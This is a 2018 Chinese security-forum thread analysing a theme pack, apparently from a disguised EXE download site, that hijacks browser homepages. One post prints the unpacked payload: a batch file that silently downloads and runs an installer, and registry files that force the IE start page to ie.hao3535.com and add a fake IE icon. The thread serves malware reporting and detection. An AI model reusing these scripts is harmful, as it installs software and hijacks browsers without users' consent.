这个网站下载的主题好恶心篡改主页

显示全部楼层 · 发表于 2018-1-3 21:28:44

本帖最后由 Ytqing 于 2018-1-4 10:41 编辑

www.dnzhuti.com
随便下载一个主题包
exe文件
电脑分分钟中招
浏览器主页被XX
腾讯哈勃https://habo.qq.com/file/showdet ... =ADMGYl1sB2QIP1s%2B

显示全部楼层 · 发表于 2018-1-3 21:51:41

不清楚是否篡改主页

显示全部楼层 · 发表于 2018-1-3 22:37:38

有趣

显示全部楼层 · 发表于 2018-1-3 23:37:01

本帖最后由 fireherman 于 2018-1-3 23:41 编辑

ESET scan miss

VT: https://www.virustotal.com/#/fil ... 175e46204/detection

Live Grid [未收录/已上报]，顺便把网址拉黑，顺便把网址提交给FireFox

显示全部楼层 · 发表于 2018-1-4 01:05:13

curl.bat (偷偷下载+后台安装）

[url=home.php?mod=space&uid=331734]@echo[/url] off
curl.exe -o kuwo_jm694.exe http://down.kuwo.cn/mbox/kuwo_jm694.exe
kuwo_jm694

复制代码

IE.reg

Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000000-0000-0000-0000-000000000001}]
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}]
@="Internet Explorer"
"InfoTip"="@C:\\Windows\\system32\\zh-CN\\ieframe.dll.mui,-881"
"LocalizedString"="@C:\\Windows\\system32\\zh-CN\\ieframe.dll.mui,-880"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\DefaultIcon]
@="C:\\Windows\\system32\\ieframe.dll,-190"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell]
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\NoAddOns]
@="在没有加载项的情况下启动"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\NoAddOns\Command]
@="C:\\Program Files\\Internet Explorer\\iexplore.exe http://ie.hao3535.com/?zhuti/"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Open]
@="打开主页(H)"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Open\Command]
@="C:\\Program Files\\Internet Explorer\\iexplore.exe http://ie.hao3535.com/?zhuti/"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Properties]
@="属性(R)"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Properties\Command]
@="Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl"
[HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\ShellFolder]
"Attributes"=dword:00000000

复制代码

zhuti.reg (篡改浏览器设置)

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MAIN]
"Start Page"="ie.hao3535.com/?zhuti/"
"First Home Page"="ie.hao3535.com/?zhuti/"
"Default_Page_URL"="ie.hao3535.com/?zhuti/"
"Search Page"="ie.hao3535.com/?zhuti/"
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main]
"Start Page"="ie.hao3535.com/?zhuti/"
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"HomePage"="1"

复制代码

显示全部楼层 · 发表于 2018-1-4 09:40:48

360 MISS
HMP miss

显示全部楼层 · 发表于 2018-1-4 09:44:59

主题是exe的你也敢用

显示全部楼层 · 发表于 2018-1-4 10:50:33

蓝泽祈发表于 2018-1-4 09:44
主题是exe的你也敢用

看着很好看在虚拟机一玩中招了

显示全部楼层 · 发表于 2018-1-4 10:52:49

191196846 发表于 2018-1-3 22:37
有趣

这东西的确设置了密码是一个rar自解压文件（带密码）自解压后才是真正程序

显示全部楼层 · 发表于 2018-1-4 10:53:09

Dolby123 发表于 2018-1-4 01:05
curl.bat (偷偷下载+后台安装）

IE.reg

大佬厉害！

[可疑文件] 这个网站下载的主题好恶心篡改主页

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

[可疑文件] 这个网站下载的主题好恶心 篡改主页

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

[可疑文件] 这个网站下载的主题好恶心篡改主页